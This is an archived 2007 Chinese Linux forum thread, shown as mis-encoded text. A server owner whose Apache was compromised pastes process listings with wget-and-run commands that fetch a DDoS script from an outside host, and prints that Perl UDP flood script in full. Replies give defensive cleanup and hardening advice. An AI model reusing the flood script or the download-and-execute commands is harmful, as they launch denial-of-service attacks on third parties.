LinuxÒÁµéÔ°ÂÛ̳'s Archiver

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 11:57

½ô¼±Çó¾È£¡ÎÒϵͳÊDz»ÊÇÖÐÕÐÁ˰¢£¿Õ¦¸ö°ì£¿

ϵͳ:centos4   apache2.2.6+php4.4.7

ps -axuf ²é¿´:

root      4826  0.0  0.1 11372 4932 ?        Ss   Sep11   0:07 /usr/local/httpd/bin/httpd -k start
nobody   18607  0.0  0.1 12240 5204 ?        S    07:55   0:01  \_ /usr/local/httpd/bin/httpd -k start
nobody   18730  0.0  0.0  6312 1060 ?        S    08:24   0:00  |   \_ sh -c cd /tmp;./udp.pl 200.149.101.147 53 200
nobody   18731  100  0.0  7172 2212 ?        R    08:24  46:24  |       \_ /usr/bin/perl ./udp.pl 200.149.101.147 53 200
nobody   18612  0.0  0.1 12232 5188 ?        S    07:55   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18714  0.0  0.0  6092 1060 ?        S    08:23   0:00  |   \_ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18715  0.0  0.0  7460 1604 ?        S    08:23   0:00  |       \_ wget bym.t35.com/ddos/udp.pl
nobody   18642  0.0  0.1 12304 5180 ?        S    08:08   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18646  0.0  0.0  6388 1060 ?        S    08:11   0:00  |   \_ sh -c cd /tmp;wget [url]http://bym.t35.com/ddos/udp.pl[/url]
nobody   18647  0.0  0.0  7508 1608 ?        S    08:11   0:00  |       \_ wget [url]http://bym.t35.com/ddos/udp.pl[/url]
nobody   18655  0.0  0.1 12356 5188 ?        S    08:12   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18686  0.0  0.0  7240 1056 ?        S    08:15   0:00  |   \_ sh -c cd /tmp;perl udp.pl 200.149.101.148 80 500
nobody   18687 99.8  0.0  7544 2212 ?        R    08:15  54:58  |       \_ perl udp.pl 200.149.101.148 80 500
nobody   18695  0.0  0.1 12356 5180 ?        S    08:18   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18712  0.0  0.0  6460 1060 ?        S    08:22   0:00  |   \_ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18713  0.0  0.0  8624 1588 ?        S    08:22   0:00  |       \_ wget bym.t35.com/ddos/udp.pl



ÔÚtmp Ŀ¼ÏÂÃæÓÐ udp.plÎļþ£¬ÄÚÈÝÈçÏ£º

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (; {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (; {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

´ó¼Ò°ïæ¿´¿´
ʲôԭÒò°¢£¿¸Õ¿ªÊ¼ÒÔΪÊÇphpºÍapacheµÃ°æ±¾Ì«µÍ£¬×òÌì¸ÕÉý¼¶µ½×îа汾£¬»¹ÊÇÕâÑù£¡

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 11:58

ͬʱ»¹´ò¿ªÁËÒ»¸öudp ¶Ë¿Ú£¬¶Ë¿ÚÔËÐеÄÊÇ ./bash
°Ñ½ø³ÌɱËÀºó£¬udp¶Ë¿ÚÒ²¾Í¹Ø±ÕÁË¡£

bwb ·¢±íÓÚ 2007-9-22 15:25

ÊÇÓеã¿ÉÒÉ
[code]#last[/code]
¿´¿´Ôõô˵¡£

Roc.Ken ·¢±íÓÚ 2007-9-22 15:26

bash µÄ¶Ë¿ÚÓ¦¸ÃÊÇTCPµÄ°É

Äã¼ì²éһϠweb·þÎñ ÊDz»ÊÇÓÐÈÎÒâÓû§¿ÉÉÏ´«µÄ©¶´.
ËûÃÇÀûÓÃÁË httpd µÄ©¶´À´µ÷ÓóÌÐòʵÏÖ¹¥»÷, Ó¦¸Ã»¹Ã»ÓнøÈëÄãµÄϵͳ.

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 17:36

netstat²é¿´ÊÇudp¶Ë¿Ú£¬3ÍòÒÔÉϵÄ

last ²é¿´Ã»ÓÐÈκοÉÒɵǽ

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 17:38

¡°Äã¼ì²éһϠweb·þÎñ ÊDz»ÊÇÓÐÈÎÒâÓû§¿ÉÉÏ´«µÄ©¶´¡± Õâ¸öÔõô¼ì²é°¡£¿
Âé·³°ßÖñÃ÷ʾ£¡Ð»Ð»£¡

yjuutrhe ·¢±íÓÚ 2007-9-22 17:39

²»ÓпÉÒÉÁË,Öж¾ÁËû´í,²»ÖªµÀÂ¥Ö÷ÓÐûÓÐ×°ÈðÐÇɱ¶¾Èí¼þ,Èç¹ûÓиϽôÔÚ°²È«Ä£Ê½ÏÂȥɱ,¹À¼Æ²»»áÓжà´óÎÊÌâ.

bwb ·¢±íÓÚ 2007-9-22 17:40

[quote]Ô­ÌûÓÉ [i]yjuutrhe[/i] ÓÚ 2007-9-22 17:39 ·¢±í [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585007&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
²»ÓпÉÒÉÁË,Öж¾ÁËû´í,²»ÖªµÀÂ¥Ö÷ÓÐûÓÐ×°ÈðÐÇɱ¶¾Èí¼þ,Èç¹ûÓиϽôÔÚ°²È«Ä£Ê½ÏÂȥɱ,¹À¼Æ²»»áÓжà´óÎÊÌâ. [/quote]
ÈðÐÇÂºÃÏñ»¹Ã»ÓÐÕâ¸ö±¾Ê°É~~~

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 17:45

ÓõÄÊÇlinuxϵͳ
centos 4.5

bwb ·¢±íÓÚ 2007-9-22 17:50

[quote]Ô­ÌûÓÉ [i]wuyuhua_2000[/i] ÓÚ 2007-9-22 17:38 ·¢±í [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585006&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
¡°Äã¼ì²éһϠweb·þÎñ ÊDz»ÊÇÓÐÈÎÒâÓû§¿ÉÉÏ´«µÄ©¶´¡± Õâ¸öÔõô¼ì²é°¡£¿
Âé·³°ßÖñÃ÷ʾ£¡Ð»Ð»£¡ [/quote]
²é/etc/httpd£¨°æ±¾²»Í¬£¬¿ÉÄÜĿ¼²»Ì«Ò»Ñù£¬µ«ÊÇÒ»°ãÊÇÕâ¸öĿ¼£©ÏµÄhttpd.confÀïµÄallow×ֶΰɣ¬»¹ÓÐDocuments£¨·ÅÍøÕ¾ÄÚÈݵÄĿ¼£©ÏµÄȨÏÞÊDz»ÊDZä³É777ÊôÐÔÁË£¬¸Ä³É755ÊôÐÔ¡£
»¹ÓУ¬Èç¹ûʹÓÃftpÉÏ´«¡¢¹ÜÀíÍøÕ¾µÄ»°£¬×îºÃ¸Ä³Éscp£¨»ùÓÚsshµÄ´«Ê䣩£¬½«ftp·þÎñÆ÷¹Øµô¡£
Roc.Ken¿´¿´¹»²»¹»£¿

bwb ·¢±íÓÚ 2007-9-22 18:02

Èç¹ûÓÐSELinux¿ÉÒÔ¿ª¿ª£¬Ô¤·ÀÕâÀàÊÂÇéÔÙ·¢Éú¡£

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 18:09

»Ø¸´ #10 bwb µÄÌû×Ó

bwb,ÄúºÃ£¡

Documents ϵÄÎļþÊôÐÔÊÇ644 ,Îļþ¼ÐÊôÐÔÊÇ 755

ftp ÉÏ´«ÓõÄÊÇvsftpd ,ÎҲ鿴ÁËftp ÈÕÖ¾£¬Ã»ÓÐÒì³££»scpûÓÐÓùý£¬ÓпÕѧѧ£¡

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 18:11

»Ø¸´ #11 bwb µÄÌû×Ó

°²×°µÄʱºòÆÁ±ÎÁË£¬²»ÏþµÃÓÐûÓа취²¹¾È£¡

bwb ·¢±íÓÚ 2007-9-22 18:19

[quote]Ô­ÌûÓÉ [i]wuyuhua_2000[/i] ÓÚ 2007-9-22 18:11 ·¢±í [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585014&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
°²×°µÄʱºòÆÁ±ÎÁË£¬²»ÏþµÃÓÐûÓа취²¹¾È£¡ [/quote]
ÎÒÔÚÎÒÄÇÔÜÁ˼¸¸öÌû×Ó£¬ÄãÏÈ¿´¿´£¬Èç¹û»¹²»¹»¿ÉÒÔÉϹ·¹·ËÑһϣ¬ÎÒµÄÒ²ÊÇÓù·¹·Ëѵġ£SELinuxµÄÉèÖÃÓÐÒ»µãµãÂé·³£¬²»¹ýºÜÓÐЧ¡£
[url]http://www.thtbase.com/BBS/viewthread.php?tid=406&extra=page%3D1[/url]

bwb ·¢±íÓÚ 2007-9-22 18:20

SCPÒ²¿ÉÒÔËÑËÑ£¬°ÑFTP·ÏÁ˰ɡ£

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 18:28

[quote]Ô­ÌûÓÉ [i]bwb[/i] ÓÚ 2007-9-22 18:20 ·¢±í [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585017&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
SCPÒ²¿ÉÒÔËÑËÑ£¬°ÑFTP·ÏÁ˰ɡ£ [/quote]

лл
scpºÜºÃÓÃÂ

wuyuhua_2000 ·¢±íÓÚ 2007-9-22 18:30

[quote]Ô­ÌûÓÉ [i]bwb[/i] ÓÚ 2007-9-22 18:19 ·¢±í [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585016&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]

ÎÒÔÚÎÒÄÇÔÜÁ˼¸¸öÌû×Ó£¬ÄãÏÈ¿´¿´£¬Èç¹û»¹²»¹»¿ÉÒÔÉϹ·¹·ËÑһϣ¬ÎÒµÄÒ²ÊÇÓù·¹·Ëѵġ£SELinuxµÄÉèÖÃÓÐÒ»µãµãÂé·³£¬²»¹ýºÜÓÐЧ¡£
[url]http://www.thtbase.com/BBS/viewthread.php?tid=406&extra=page%3D1[/url] [/quote]


µ±³õ¾ÍÊǾõµÃÌ«¸´ÔÓÁË£¬¾ÍûÓÐÕû¡£ºó»Úμ°°¡£¡

bwb ·¢±íÓÚ 2007-9-22 18:37

SELinuxÊÇÓеãÂé·³£¬²»¹ý¼õÉÙÁËÈëÇÖ£º
[quote]
...
ʲôÊÇSELinux£¿SELinuxÈ«³ÆÊÇSecurity Enhanced Linux£¬ÓÉÃÀ¹ú¹ú¼Ò°²È«²¿(National Security Agency)Áìµ¼¿ª·¢µÄGPLÏîÄ¿£¬ËüÓµÓÐÒ»¸öÁé»î¶øÇ¿ÖÆÐԵķÃÎÊ¿ØÖƽṹ£¬Ö¼ÔÚÌá¸ßLinuxϵͳµÄ°²È«ÐÔ£¬Ìṩǿ½¡µÄ°²È«±£Ö¤£¬¿É·ÀÓùδ֪¹¥»÷£¬¾Ý³ÆÏ൱ÓÚB1¼¶µÄ¾üʰ²È«ÐÔÄÜ¡£±ÈMS NTËùνµÄC2µÈ¸ßµÃ¶à¡£
[/quote]

scp²¢²»ÊǺܸ´ÔÓ£¬ÓÈÆäÊÇÓÃWindows¹ÜÀíÍøÕ¾Ê±¿ÉÒÔÓÃС¹¤¾ßWinSCP£¬»¹ÊDZȽϺÃÓõġ£×î½üÎÒÔÚÎҵıʼDZ¾Éϰ²×°ÁËubuntu7.04£¬·¢ÏÖÕâÉÏÃægnome×Ô´øµÄ¹¤¾ß±ÈWinSCP»¹ºÃÓá£

Roc.Ken ·¢±íÓÚ 2007-9-23 01:53

[quote]Ô­ÌûÓÉ [i]wuyuhua_2000[/i] ÓÚ 2007-9-22 17:36 ·¢±í [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585005&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
netstat²é¿´ÊÇudp¶Ë¿Ú£¬3ÍòÒÔÉϵÄ

last ²é¿´Ã»ÓÐÈκοÉÒɵǽ [/quote]
˵Ã÷ËûÃÇ»¹ÔÚͨ¹ý httpd Ö´Ðнű¾, ÏȰÑÏà¹ØµÄ³ÌÐò kill µô:
pkill -9 perl
pkill -9 udp.pl

²»ÖªÄã apache ±àÒëʱʹÓÃÁËÄÄЩ²ÎÊý?

Roc.Ken ·¢±íÓÚ 2007-9-23 01:53

[quote]Ô­ÌûÓÉ [i]bwb[/i] ÓÚ 2007-9-22 18:37 ·¢±í [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585022&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
SELinuxÊÇÓеãÂé·³£¬²»¹ý¼õÉÙÁËÈëÇÖ£º


scp²¢²»ÊǺܸ´ÔÓ£¬ÓÈÆäÊÇÓÃWindows¹ÜÀíÍøÕ¾Ê±¿ÉÒÔÓÃС¹¤¾ßWinSCP£¬»¹ÊDZȽϺÃÓõġ£×î½üÎÒÔÚÎҵıʼDZ¾Éϰ²×°ÁËubuntu7.04£¬·¢ÏÖÕâÉÏÃægnome×Ô´øµÄ¹¤¾ß±ÈWinSCP»¹ºÃÓᣠ[/quote]

WINSCPµÄÈ·ºÃÓÃ, ÎÒÊÇ×î½ü²Å·¢ÏÖµÄ.

Ò³: [1] 2

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.